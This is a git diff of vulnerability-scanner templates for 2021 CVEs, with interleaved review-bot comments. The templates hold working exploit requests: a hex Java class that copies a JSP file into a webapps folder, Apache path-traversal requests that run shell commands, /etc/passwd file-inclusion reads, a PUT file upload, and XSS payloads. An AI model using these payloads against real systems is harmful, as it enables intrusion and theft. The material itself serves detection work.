{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}} - --43992a07d9a30213782780204a9f032b-- - - - | - POST /./RestAPI/Connection HTTP/1.1 - Host: {{Hostname}} - Content-Type: 
application/x-www-form-urlencoded - - methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 - - - | - GET /help/admin-guide/test.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - words: - - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539 - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40875.yaml b/nuclei-templates/CVE-2021/CVE-2021-40875.yaml deleted file mode 100644 index 8aaaca1107..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40875.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2021-40875 - -info: - name: Gurock TestRail Application files.md5 Exposure - author: oscarintherocks - severity: high - description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. - reference: - - htttps://github.com/SakuraSamuraii/derailed - - https://johnjhacking.com/blog/cve-2021-40875/ - - https://www.gurock.com/testrail/tour/enterprise-edition - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-40875 - cwe-id: CWE-863 - metadata: - shodan-query: http.html:"TestRail" - tags: cve,cve2021,exposure,gurock,testrail - -requests: - - method: GET - path: - - "{{BaseURL}}/files.md5" - - "{{BaseURL}}/testrail/files.md5" - - max-size: 1000 # Define response size in bytes to read from server. - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "app/arguments/admin" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41174.yaml b/nuclei-templates/CVE-2021/CVE-2021-41174.yaml deleted file mode 100644 index 795471ebdc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41174.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: CVE-2021-41174 - -info: - name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting - author: pdteam - severity: medium - description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. - reference: - - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 - - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 - - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 - remediation: Upgrade to 8.2.3 or higher. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-41174 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Grafana" - tags: cve,cve2021,grafana,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1" - - skip-variables-check: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Grafana" - - "frontend_boot_js_done_time_seconds" - condition: and - - - type: regex - regex: - - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' - - extractors: - - type: regex - group: 1 - regex: - - '"subTitle":"Grafana ([a-z0-9.]+)' - -# Enhanced by mp on 2022/03/06 
diff --git a/nuclei-templates/CVE-2021/cve-2021-41192.yaml b/nuclei-templates/CVE-2021/CVE-2021-41192.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41192.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41192.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41293.yaml b/nuclei-templates/CVE-2021/CVE-2021-41293.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41293.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41293.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41349.yaml b/nuclei-templates/CVE-2021/CVE-2021-41349.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41349.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41349.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml b/nuclei-templates/CVE-2021/CVE-2021-41467.yaml deleted file mode 100644 index 616ba257a0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41467.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-41467 - -info: - name: JustWriting - Cross-Site Scripting - author: madrobot - severity: medium - description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. - reference: - - https://github.com/hjue/JustWriting/issues/106 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 - - https://github.com/hjue/JustWriting/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-41467 - cwe-id: CWE-79 - tags: cve,cve2021,justwriting,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/03/07 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml b/nuclei-templates/CVE-2021/CVE-2021-41569.yaml deleted file mode 100644 index a65c219ae1..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2021-41569 -info: - name: SAS 9.4 build 1520 - Local File Inclusion - author: 0x_Akoko - severity: high - description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - reference: - - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 - - https://support.sas.com/kb/68/641.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41569 - cwe-id: CWE-829 - tags: cve,cve2021,sas,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-41653.yaml b/nuclei-templates/CVE-2021/CVE-2021-41653.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41653.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41653.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41691.yaml b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41691.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41691.yaml 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41773.yaml b/nuclei-templates/CVE-2021/CVE-2021-41773.yaml
new file mode 100644
index 0000000000..bf20e22be5
--- /dev/null
+++ b/nuclei-templates/CVE-2021/CVE-2021-41773.yaml
@@ -0,0 +1,18 @@
+id: CVE-2021-41773
+info:
+ name: RCE in Apache HTTP Server 2.4.49
+ author: RafaelCaria
+ severity: critical
+ tags: cve,cve2021,rce
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+ body: 'echo;id'
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b"
diff --git a/nuclei-templates/CVE-2021/cve-2021-41826.yaml b/nuclei-templates/CVE-2021/CVE-2021-41826.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-41826.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-41826.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41878.yaml b/nuclei-templates/CVE-2021/CVE-2021-41878.yaml
deleted file mode 100644
index c760d659a5..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-41878.yaml
+++ /dev/null
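Review bot: In the double-quoted regex on the last line of the new CVE-2021-41773 template, `\b` is YAML's backspace escape rather than a regex word boundary, so the `bytes from <ip>` alternative cannot match as written. The request body only runs `id`, so that alternative looks like a leftover and the line can be reduced to `- "(uid|gid|groups)=\\d+"` (or keep it and write `\\b`). The template sends a command to the target, yet `tags: cve,cve2021,rce` has no `intrusive`, so scans that exclude intrusive templates will still run it; `tags: cve,cve2021,rce,intrusive` fixes that. The `info` block also has no `description`, `reference`, `classification` or `remediation`, and there is no status matcher, unlike the other templates in this commit.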
@@ -1,45 +0,0 @@ -id: CVE-2021-41878 - -info: - name: i-Panel Administration System 2.0 - Cross-Site Scripting - author: madrobot - severity: medium - description: | - i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console. - reference: - - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html - - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41878 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-41878 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2021,ipanel,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '>' - - 'i-Panel Administration' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-41951.yaml b/nuclei-templates/CVE-2021/CVE-2021-41951.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41951.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41951.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42013.yaml b/nuclei-templates/CVE-2021/CVE-2021-42013.yaml deleted file mode 100644 index 57150aa0e8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-42013.yaml +++ /dev/null 
@@ -1,61 +0,0 @@ -id: CVE-2021-42013 - -info: - name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution - author: nvn1729,0xd0ff9,666asd - severity: critical - description: | - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. - reference: - - https://httpd.apache.org/security/vulnerabilities_24.html - - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d - - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - - https://twitter.com/itsecurityco/status/1446136957117943815 - remediation: Upgrade to Apache HTTP Server 2.4.51 or later. 
- classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-42013 - cwe-id: CWE-22 - metadata: - verified: "true" - tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev - -variables: - cmd: "echo COP-37714-1202-EVC | rev" - -requests: - - raw: - - |+ - GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - |+ - GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - |+ - POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; {{cmd}} - - stop-at-first-match: true - unsafe: true - matchers-condition: or - matchers: - - type: regex - name: LFI - regex: - - "root:.*:0:0:" - - - type: word - name: RCE - words: - - "CVE-2021-42013" - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/cve-2021-42258.yaml b/nuclei-templates/CVE-2021/CVE-2021-42258.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-42258.yaml rename to nuclei-templates/CVE-2021/CVE-2021-42258.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-42551.yaml b/nuclei-templates/CVE-2021/CVE-2021-42551.yaml deleted file mode 100644 index 4d836adbe4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-42551.yaml +++ /dev/null 
@@ -1,49 +0,0 @@ -id: CVE-2021-42551 - -info: - name: NetBiblio WebOPAC - Cross-Site Scripting - author: compr00t - severity: medium - description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42551 - - https://www.redguard.ch/advisories/netbiblio_webopac.txt - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-42551 - cwe-id: CWE-79 - tags: cve,cve2021,xss,netbiblio - -requests: - - method: GET - path: - - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x' - - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F' - - host-redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SearchTerm: 'x'+alert(1)+'x'," - - "SearchTerm: 'x\\\\'+alert(1),//'," - condition: or - - - type: word - part: header - words: - - "text/html" - - - type: word - part: body - words: - - "NetBiblio" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-42565.yaml b/nuclei-templates/CVE-2021/CVE-2021-42565.yaml deleted file mode 100644 index e2eb25ff0b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-42565.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2021-42565 - -info: - name: myfactory FMS - Cross-Site Scripting - author: madrobot - severity: medium - description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42565 - - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms - - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-42565 - cwe-id: CWE-79 - tags: cve,cve2021,myfactory,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/cve-2021-43495.yaml b/nuclei-templates/CVE-2021/CVE-2021-43495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-43495.yaml rename to nuclei-templates/CVE-2021/CVE-2021-43495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-44529.yaml b/nuclei-templates/CVE-2021/CVE-2021-44529.yaml deleted file mode 100644 index 669869e4a2..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-44529.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2021-44529 - -info: - name: Ivanti EPM Cloud Services Appliance Code Injection - author: duty_1g,phyr3wall,Tirtha - severity: critical - description: "Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody)." - reference: - - https://forums.ivanti.com/s/article/SA-2021-12-02 - - https://twitter.com/Dinosn/status/1505273954478530569 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 - metadata: - shodan-query: title:"LANDesk(R) Cloud Services Appliance" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-44529 - cwe-id: CWE-94 - tags: cve,cve2021,ivanti,epm,csa,injection - -requests: - - raw: - - | - GET /client/index.php HTTP/1.1 - Host: {{Hostname}} - Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "phpinfo()" - - "Cloud Services Appliance" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-44848.yaml b/nuclei-templates/CVE-2021/CVE-2021-44848.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-44848.yaml rename to nuclei-templates/CVE-2021/CVE-2021-44848.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-45043.yaml b/nuclei-templates/CVE-2021/CVE-2021-45043.yaml deleted file mode 100644 index f0787778fa..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45043.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2021-45043 - -info: - name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion - author: Momen Eldawakhly,Evan Rubinstein - severity: high - description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-45043 - - https://www.exploit-db.com/exploits/50588 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043 - - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-45043 - cwe-id: CWE-22 - metadata: - google-query: intitle:"HD-Network Real-time Monitoring System V2.0" - tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot - -requests: - - raw: - - | - GET /language/lang HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45092.yaml b/nuclei-templates/CVE-2021/CVE-2021-45092.yaml deleted file mode 100644 index 9b4dd4f9f5..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45092.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2021-45092 - -info: - name: Thinfinity Iframe Injection - author: danielmofer - severity: critical - description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter. - reference: - - https://github.com/cybelesoft/virtualui/issues/2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 - - https://www.tenable.com/cve/CVE-2021-45092 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45092 - cwe-id: CWE-74 - tags: iframe,thinfinity,tenable,cve,cve2021,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/lab.html?vpath=//interact.sh" - - matchers: - - type: regex - regex: - - ".*vpath.*" - - "thinfinity" - condition: and - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45380.yaml b/nuclei-templates/CVE-2021/CVE-2021-45380.yaml deleted file mode 100644 index f02b9d272e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-45380.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2021-45380 - -info: - name: AppCMS - Cross-Site Scripting - author: pikpikcu - severity: medium - description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. - reference: - - https://github.com/source-trace/appcms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-45380 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"Powerd by AppCMS" - tags: cve,cve2021,appcms,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"">' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-45428.yaml b/nuclei-templates/CVE-2021/CVE-2021-45428.yaml new file mode 100644 index 0000000000..2ba8ceec99 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-45428.yaml 
@@ -0,0 +1,43 @@
+id: CVE-2021-45428
+info:
+ name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
+ author: gy741
+ severity: critical
+ description: |
+ TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+ reference:
+ - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
+ - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-45428
+ cwe-id: CWE-639
+ metadata:
+ shodan-query: http.html:"TLR-2005KSH"
+ verified: "true"
+ tags: cve,cve2021,telesquare,intrusive,fileupload
+requests:
+ - raw:
+ - |
+ GET /{{randstr}}.txt HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ PUT /{{randstr}}.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ CVE-2021-45428
+ - |
+ GET /{{randstr}}.txt HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 404 && status_code_2 == 201'
+ - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
+ condition: and
+
+# Enhanced by mp on 2022/05/19
diff --git a/nuclei-templates/CVE-2021/CVE-2021-45968.yaml b/nuclei-templates/CVE-2021/CVE-2021-45968.yaml
deleted file mode 100644
index 3cf2c2d6fa..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-45968.yaml
+++ /dev/null
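Review bot: The second raw request in the new CVE-2021-45428 template writes `{{randstr}}.txt` to the device and nothing afterwards removes it, so every positive scan leaves a marker file behind. The `intrusive` tag is present, but the side effect is not stated anywhere in the template. I would add a comment above `requests:` such as `# NOTE: leaves {{randstr}}.txt containing the marker on the target; remove it after verification.` and say the same in `description`. The description also has a typo: `THe PUT method` should read `The PUT method`.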
@@ -1,39 +0,0 @@ -id: CVE-2021-45968 - -info: - name: Pascom CPS Path Traversal - author: dwisiswant0 - severity: high - description: | - Pascom version packaged with Cloud Phone System (CPS) - versions before 7.20 contains a known path traversal issue - reference: - - https://kerbit.io/research/read/blog/4 - tags: cve,cve2021,pascom,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-45968 - cwe-id: CWE-22 - -requests: - - raw: - - | - GET /services/pluginscript/ HTTP/1.1 - Host: {{Hostname}} - - - | # Double parent to access CMS index - GET /services/pluginscript/..;/..;/ HTTP/1.1 - Host: {{Hostname}} - - - | # Verifying CMS - GET / HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_2 != status_code_1" - - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-46379.yaml b/nuclei-templates/CVE-2021/CVE-2021-46379.yaml deleted file mode 100644 index 21797b537e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-46379.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2021-46379 - -info: - name: D-Link DIR850 ET850-1.08TRb03 - open redirect - author: 0x_Akoko - severity: medium - description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. - reference: - - https://www.opencve.io/cve/CVE-2021-46379 - - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view - - https://www.cvedetails.com/cve/CVE-2021-46379 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-46379 - cwe-id: CWE-601 - tags: cve,cve2021,redirect,dlink,router - -requests: - - method: GET - path: - - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2021/cve-2021-46381.yaml b/nuclei-templates/CVE-2021/CVE-2021-46381.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-46381.yaml rename to nuclei-templates/CVE-2021/CVE-2021-46381.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-46387.yaml b/nuclei-templates/CVE-2021/CVE-2021-46387.yaml deleted file mode 100644 index a3ef370c63..0000000000 --- 